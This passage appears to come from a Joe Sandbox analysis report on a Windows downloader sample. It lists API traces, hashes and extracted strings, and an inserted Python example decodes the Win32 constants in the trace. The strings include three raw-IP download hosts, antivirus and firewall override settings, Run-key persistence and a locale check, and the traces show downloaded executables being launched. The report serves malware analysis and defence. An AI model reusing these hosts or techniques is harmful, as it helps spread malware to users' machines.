                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:55.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:36.8%
                                                                                Total number of Nodes:144
                                                                                Total number of Limit Nodes:12

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00DB1850
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 00DB18E8
                                                                                • GetLastError.KERNEL32 ref: 00DB18F4
                                                                                • ExitProcess.KERNEL32 ref: 00DB1903
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00DB196D
                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 00DB197A
                                                                                • wsprintfW.USER32 ref: 00DB1999
                                                                                • DeleteFileW.KERNELBASE(?), ref: 00DB19A9
                                                                                • wcscmp.MSVCR90 ref: 00DB19C2
                                                                                • ExitProcess.KERNEL32 ref: 00DB19E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteErrorFindLastModuleMutexPathSleepwcscmpwsprintf
                                                                                • String ID: %s%s$%s:Zone.Identifier$%s\%s$%s\%s$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Service$http://185.215.113.66/$http://193.233.132.177/$http://91.202.233.141/$winploravr.exe$xouauxuax
                                                                                • API String ID: 1209637258-903396872
                                                                                • Opcode ID: bef250098aef5a439628c782a743f770a640ba81bccfb246cbf9c5bb39022247
                                                                                • Instruction ID: ca7f2e0c2e5a70440880ed7d23354e975ea13ecb8b2c48225b57b88263ee49f8
                                                                                • Opcode Fuzzy Hash: bef250098aef5a439628c782a743f770a640ba81bccfb246cbf9c5bb39022247
                                                                                • Instruction Fuzzy Hash: 4DF123F5A40314EBEB24DF50DC49FE97779AB48704F404688B30AA6290DBB16B88DF75

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CryptImportKey.ADVAPI32(?,00DB31C8,00000214,00000000,00000000,00000000), ref: 00DB112A
                                                                                • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB114B
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00DB1164
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00DB1185
                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DB11A4
                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 00DB11F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB122D
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DB1234
                                                                                  • Part of subcall function 00DB1020: memcpy.MSVCR90 ref: 00DB107F
                                                                                  • Part of subcall function 00DB1020: memcpy.MSVCR90 ref: 00DB1093
                                                                                  • Part of subcall function 00DB1020: CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 00DB10B7
                                                                                  • Part of subcall function 00DB1020: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 00DB10DD
                                                                                  • Part of subcall function 00DB1020: CryptDestroyKey.ADVAPI32(00000000), ref: 00DB10F0
                                                                                • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 00DB1274
                                                                                • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 00DB1295
                                                                                • memcpy.MSVCR90 ref: 00DB12AF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB12BD
                                                                                • HeapFree.KERNEL32(00000000), ref: 00DB12C4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00DB12CE
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00DB12D8
                                                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000), ref: 00DB12F2
                                                                                • SetEndOfFile.KERNELBASE(000000FF), ref: 00DB12FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00DB1306
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 00DB1310
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHashImportProcessView$AllocateChangeDataEncryptFindFreeHandleMappingNotificationPointerSignatureSizeUnmapVerify
                                                                                • String ID: NGS!
                                                                                • API String ID: 2706389988-4070929822
                                                                                • Opcode ID: 1e714e8cbb9440874276c6e68a0d60c8dc1baeafd035b81f3c8e3f038cae4d49
                                                                                • Instruction ID: 5dfd11b03ad59389670d0b7af7afb30a54d27e8534350b0d4f700f03096bc5ce
                                                                                • Opcode Fuzzy Hash: 1e714e8cbb9440874276c6e68a0d60c8dc1baeafd035b81f3c8e3f038cae4d49
                                                                                • Instruction Fuzzy Hash: 58611875A00209EBDB14DFE4DC5AFAEBBB5AF48700F148648F601E7280D775AA40CB74

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memcpy.MSVCR90 ref: 00DB107F
                                                                                • memcpy.MSVCR90 ref: 00DB1093
                                                                                • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 00DB10B7
                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 00DB10DD
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 00DB10F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                • String ID:
                                                                                • API String ID: 774555595-0
                                                                                • Opcode ID: 9cee97771e46878ae171b9f834df2ebd1db762ab76c480d087e623b2d8449c17
                                                                                • Instruction ID: 3f925a62a1f086b1eda7acba0205cf5cf7e7673f6797723c40b9ea9304bb2e84
                                                                                • Opcode Fuzzy Hash: 9cee97771e46878ae171b9f834df2ebd1db762ab76c480d087e623b2d8449c17
                                                                                • Instruction Fuzzy Hash: 783124B5D04249EFDB00CFE8C841BEEBBB4AF48300F008159EA05E7280E7759A48DBB5

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCR90 ref: 00DB174E
                                                                                • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A), ref: 00DB1763
                                                                                • strcmp.MSVCR90 ref: 00DB1772
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocalememsetstrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3255129521-64918367
                                                                                • Opcode ID: 41965c178d848f35ed75459df61e5c8605a6d8458ad24b2179b5ca93fbf233a1
                                                                                • Instruction ID: 3bef70066f9d46d8c3aa3991e50a88393cfe50889c4b41047555d1fe32d262a7
                                                                                • Opcode Fuzzy Hash: 41965c178d848f35ed75459df61e5c8605a6d8458ad24b2179b5ca93fbf233a1
                                                                                • Instruction Fuzzy Hash: 83E0487EE44308F6DA10A6A09C57FD977689B11B02F404554BF06571C1F9B1E71C97F2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(00DB5018,00000000,00000000,00000018,F0000000), ref: 00DB1013
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: AcquireContextCrypt
                                                                                • String ID:
                                                                                • API String ID: 3951991833-0
                                                                                • Opcode ID: 13b6d9095c7e39f6188444a19bf1c7e97284b846dffc34c4c743c3211461be8c
                                                                                • Instruction ID: b725af2ef275d96960ec775c50a2340f06929c739b5a4a2b4082053813d63471
                                                                                • Opcode Fuzzy Hash: 13b6d9095c7e39f6188444a19bf1c7e97284b846dffc34c4c743c3211461be8c
                                                                                • Instruction Fuzzy Hash: 04B092302C8708F6E9602695AC07F8076088B48F22F204010B309681CA49E1B20822FE

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00DB1329
                                                                                • srand.MSVCR90 ref: 00DB1330
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00DB1350
                                                                                • strlen.MSVCR90 ref: 00DB135A
                                                                                • mbstowcs.MSVCR90 ref: 00DB1371
                                                                                • rand.MSVCR90 ref: 00DB1379
                                                                                • rand.MSVCR90 ref: 00DB138D
                                                                                • wsprintfW.USER32 ref: 00DB13B4
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00DB13CA
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00DB13F9
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB1428
                                                                                • memset.MSVCR90 ref: 00DB144F
                                                                                • InternetReadFile.WININET(00000000,?,00000207,?), ref: 00DB1471
                                                                                • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00DB14A2
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00DB14B1
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB14BC
                                                                                • wsprintfW.USER32 ref: 00DB14D5
                                                                                • DeleteFileW.KERNELBASE(?), ref: 00DB14E5
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB14F0
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB1511
                                                                                • DeleteFileW.KERNEL32(?), ref: 00DB153E
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00DB154B
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1558
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1565
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB1570
                                                                                • rand.MSVCR90 ref: 00DB1585
                                                                                • Sleep.KERNEL32 ref: 00DB159C
                                                                                • rand.MSVCR90 ref: 00DB15A2
                                                                                • rand.MSVCR90 ref: 00DB15B6
                                                                                • wsprintfW.USER32 ref: 00DB15D7
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 00DB15E7
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00DB1601
                                                                                • wsprintfW.USER32 ref: 00DB161D
                                                                                • DeleteFileW.KERNEL32(?), ref: 00DB162D
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB1638
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB1659
                                                                                • DeleteFileW.KERNEL32(?), ref: 00DB1677
                                                                                Strings
                                                                                • %ls:Zone.Identifier, xrefs: 00DB14C9
                                                                                • %temp%, xrefs: 00DB134B
                                                                                • %s\%d%d.exe, xrefs: 00DB13A8
                                                                                • %ls:Zone.Identifier, xrefs: 00DB1611
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 00DB13C5
                                                                                • %s\%d%d.exe, xrefs: 00DB15CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$Closewsprintf$Handle$Open$CacheChangeCountCreateDownloadEntryEnvironmentExpandFindNotificationReadStringsTickWritembstowcsmemsetsrandstrlen
                                                                                • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 101429522-1471993759
                                                                                • Opcode ID: 5a1cdec339022d55f25b1a36af9e658e12d53b014332466433d3d8ee2c5f9887
                                                                                • Instruction ID: ecdcfdc283ded5e2a40b7bc776c554af787e21e01fc3d100d4b47b4e946b9e34
                                                                                • Opcode Fuzzy Hash: 5a1cdec339022d55f25b1a36af9e658e12d53b014332466433d3d8ee2c5f9887
                                                                                • Instruction Fuzzy Hash: 6281C3B5900314EBD720EB64DC5AFEA7379AF88700F444698F60AD2281DA75EB94CF71

                                                                                Control-flow Graph (basic blocks with their successor edges; the executed / not-executed colouring of the graph image is not recoverable in text)
                                                                                • Block 86: db1690-db16f0 memset * 2, CreateProcessW → 87, 88
                                                                                • Block 87: db16f2-db16ff Sleep → 89
                                                                                • Block 88: db1701-db1725 ShellExecuteW → 90, 91
                                                                                • Block 89: db1738-db173b
                                                                                • Block 90: db1727-db1734 Sleep → 89
                                                                                • Block 91: db1736 → 89
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 00DB169E
                                                                                • memset.MSVCR90 ref: 00DB16AE
                                                                                • CreateProcessW.KERNELBASE(00000000,00DB166B,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00DB16E7
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB16F7
                                                                                • ShellExecuteW.SHELL32(00000000,open,00DB166B,00000000,00000000,00000000), ref: 00DB1712
                                                                                • Sleep.KERNEL32(000003E8), ref: 00DB172C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: 9f8903f60554e59037c298084ce10d6c588f649ce6426cc02248302180e9ced4
                                                                                • Instruction ID: e45fc493c21031ba342910cac64357019ee2966a1d6d3246bb0c18a89524e15e
                                                                                • Opcode Fuzzy Hash: 9f8903f60554e59037c298084ce10d6c588f649ce6426cc02248302180e9ced4
                                                                                • Instruction Fuzzy Hash: 18111F75A90308FBEB10DF90DC56FDD7778AB14B01F600115FA09AF2C0DAB1AA049775

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00DB17A7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00DB17C6
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00DB17EF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1818
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00DB1822
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00DB182D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 00DB17A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3859284184.0000000000DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00DB0000, based on PE: true
                                                                                • Associated: 00000007.00000002.3859253555.0000000000DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000007.00000002.3861054037.0000000000DB6000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_db0000_1146722911.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-173034443
                                                                                • Opcode ID: f31d3675f910630ce9d87874e19aa10427e22dd1e856fd3a9396b9890415faa1
                                                                                • Instruction ID: 9a1a62aff80fe434aed324d50b7c2c33519d8d44463de381cf86301bc6d19ace
                                                                                • Opcode Fuzzy Hash: f31d3675f910630ce9d87874e19aa10427e22dd1e856fd3a9396b9890415faa1
                                                                                • Instruction Fuzzy Hash: AD21FC79A40308FBDB10DF94CC49FDEB7B9AB08705F148558EA15AB2C0C7B56A00DB61
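The trace prints every argument as a bare 8-digit hex value, so the meaning of a call such as HttpQueryInfoA(...,20000005,?,00000004,...) or CryptCreateHash(?,00008004,...) is only visible to a reader who remembers the SDK constants. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it decodes the constants that occur in the records on this page (the HttpQueryInfoA and InternetOpenA calls in this record, the CreateFileW, CreateProcessW and Sleep calls in the records above, and the CreateFileMappingA, MapViewOfFile, CryptCreateHash and CryptImportKey calls in the CryptVerifySignatureA routine further down) using tables copied from the Windows SDK headers. The key-blob size inference at the end is the example's own heuristic, and the SAMPLE_CALLS list is constructed from the trace lines on this page. Read this way, 20000005 is HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER with a 4-byte output buffer: the routine opens the URL and reads Content-Length as a DWORD, which is consistent with the report's "check if Internet connection is working" signature rather than with a download.

```python
# Added example (not from the report or the sample): decode the raw hexadecimal Win32
# arguments Joe Sandbox prints in its API trace into the named SDK constants.
# Tables copied from winnt.h, fileapi.h, memoryapi.h, wininet.h and wincrypt.h;
# key_blob_layout() is this example's own heuristic.

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
PAGE_PROTECT = {2: "PAGE_READONLY", 4: "PAGE_READWRITE", 8: "PAGE_WRITECOPY"}
FILE_MAP = {1: "FILE_MAP_COPY", 2: "FILE_MAP_WRITE", 4: "FILE_MAP_READ"}
CREATION_FLAGS = {0x00000004: "CREATE_SUSPENDED", 0x00000010: "CREATE_NEW_CONSOLE",
                  0x00000020: "NORMAL_PRIORITY_CLASS", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
                  0x08000000: "CREATE_NO_WINDOW"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
HTTP_QUERY_INFO = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE",
                   21: "HTTP_QUERY_RAW_HEADERS", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}
HTTP_QUERY_FLAGS = {0x80000000: "HTTP_QUERY_FLAG_REQUEST_HEADERS",
                    0x40000000: "HTTP_QUERY_FLAG_SYSTEMTIME",
                    0x20000000: "HTTP_QUERY_FLAG_NUMBER", 0x10000000: "HTTP_QUERY_FLAG_COALESCE"}
CALG = {0x8003: "CALG_MD5", 0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256",
        0x6801: "CALG_RC4", 0x660E: "CALG_AES_128", 0x2400: "CALG_RSA_SIGN"}


def hexarg(token):
    """Joe Sandbox prints each argument as hex digits, or '?' (or a string) when not a number."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def bitflags(value, table):
    """Decompose a mask into named flags; bits not in the table are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return " | ".join(names) or "0"


def http_query_info(value):
    """HttpQueryInfo dwInfoLevel = query id in the low bits | modifier flags in the top nibble."""
    query, flags = value & 0x0FFFFFFF, value & 0xF0000000
    parts = [HTTP_QUERY_INFO.get(query, f"HTTP_QUERY_{query}")]
    if flags:
        parts.append(bitflags(flags, HTTP_QUERY_FLAGS))
    return " | ".join(parts)


def key_blob_layout(length):
    """Heuristic (example's own): blob layouts a CryptImportKey dwDataLen is consistent with.
    PUBLICKEYBLOB = BLOBHEADER(8) + RSAPUBKEY(12) + modulus; PLAINTEXTKEYBLOB = BLOBHEADER(8)
    + DWORD key length(4) + key bytes."""
    guesses = []
    if length > 20 and (length - 20) % 64 == 0:
        guesses.append(f"PUBLICKEYBLOB, {(length - 20) * 8}-bit RSA modulus")
    if length - 12 in (8, 16, 24, 32):
        guesses.append(f"PLAINTEXTKEYBLOB, {(length - 12) * 8}-bit symmetric key")
    return guesses


# api -> {argument index: (parameter name, decoder)}
DECODERS = {
    "CreateFileW": {1: ("dwDesiredAccess", lambda v: bitflags(v, GENERIC_ACCESS)),
                    4: ("dwCreationDisposition", CREATE_DISPOSITION.get)},
    "CreateFileMappingA": {2: ("flProtect", PAGE_PROTECT.get)},
    "MapViewOfFile": {1: ("dwDesiredAccess", lambda v: bitflags(v, FILE_MAP))},
    "CreateProcessW": {5: ("dwCreationFlags", lambda v: bitflags(v, CREATION_FLAGS))},
    "InternetOpenA": {1: ("dwAccessType", INTERNET_OPEN_TYPE.get)},
    "InternetOpenW": {1: ("dwAccessType", INTERNET_OPEN_TYPE.get)},
    "HttpQueryInfoA": {1: ("dwInfoLevel", http_query_info)},
    "CryptCreateHash": {1: ("Algid", CALG.get)},
    "CryptImportKey": {2: ("dwDataLen", key_blob_layout)},
    "Sleep": {0: ("dwMilliseconds", lambda v: f"{v} ms")},
}


def decode_call(api, args):
    """Return {parameter: decoded value} for the arguments of one trace line."""
    out = {}
    for index, (name, decode) in DECODERS.get(api, {}).items():
        if index < len(args):
            value = hexarg(args[index])
            if value is not None:
                out[name] = decode(value)
    return out


# Constructed sample: (api, args) pairs copied from the trace records on this page.
SAMPLE_CALLS = [
    ("HttpQueryInfoA", ["00000000", "20000005", "?", "00000004", "00000000"]),
    ("CreateFileW", ["?", "40000000", "00000000", "00000000", "00000002", "00000000", "00000000"]),
    ("CreateFileW", ["?", "C0000000", "00000001", "00000000", "00000003", "00000000", "00000000"]),
    ("CryptCreateHash", ["?", "00008004", "00000000", "00000000", "?"]),
    ("CryptImportKey", ["?", "002A31C8", "00000214", "00000000", "00000000", "00000000"]),
    ("CryptImportKey", ["?", "00000008", "0000001C", "00000000", "00000000", "00000000"]),
    ("MapViewOfFile", ["00000000", "00000006", "00000000", "00000000", "00000000"]),
    ("CreateProcessW", ["00000000", "00DB166B", "00000000", "00000000", "00000000",
                        "00000020", "00000000", "00000000", "00000044", "?"]),
]


def decode_all(calls=SAMPLE_CALLS):
    """Decode every sample call; returns a list of (api, decoded-parameters) pairs."""
    return [(api, decode_call(api, args)) for api, args in calls]


if __name__ == "__main__":
    for api, decoded in decode_all():
        print(f"{api:18s} {decoded}")
```

On this page the decoder turns the two CryptImportKey lengths into a 532-byte blob (20-byte header plus a 512-byte modulus, i.e. a 4096-bit RSA public key used with CryptVerifySignatureA) and a 28-byte blob (12-byte header plus a 16-byte symmetric key used with CryptEncrypt), and CryptCreateHash 0x8004 into CALG_SHA1; the blob interpretation is the heuristic above, not something the report states.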

                                                                                Callgraph

                                                                                Control-flow Graph (basic blocks with their successor edges; the executed / not-executed colouring of the graph image is not recoverable in text)
                                                                                • Block 0: b510a0-b510b8 Sleep, call b51000 → 3, 4
                                                                                • Block 3: b5111d-b51120
                                                                                • Block 4: b510ba-b51117 DeleteUrlCacheEntry * 9 → 3
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00B510A8
                                                                                  • Part of subcall function 00B51000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00B5101A
                                                                                  • Part of subcall function 00B51000: wsprintfW.USER32 ref: 00B51033
                                                                                  • Part of subcall function 00B51000: PathFileExistsW.KERNELBASE(?), ref: 00B51043
